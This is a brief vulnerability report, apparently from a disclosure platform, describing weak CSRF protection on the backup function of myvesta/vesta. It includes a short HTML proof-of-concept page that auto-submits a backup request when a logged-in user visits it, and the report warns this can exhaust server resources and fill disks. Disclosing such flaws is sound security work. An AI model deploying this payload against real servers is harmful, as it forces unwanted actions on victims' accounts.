Cross-Site Request Forgery (CSRF) in myvesta/vesta
Aug 24th 2021
In this application there is weak CSRF protection on backup functionality. therefore according to below
POC.html when a logged in user visits attacker website then an unintentional backup request sends to application.
🕵️♂️ Proof of Concept
//PoC.html <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://demo.myvesta.com/schedule/backup/"> <input type="submit" value="Submit request" /> </form> <script> document.forms.submit(); </script> </body> </html>
This vulnerability is capable of forging admin or user to an unintentional backup that can cause using server resource and Disc filling.
Tested on Edge, Firefox, chrome and safari. 📍 Location index.php#L1 📝 References csrf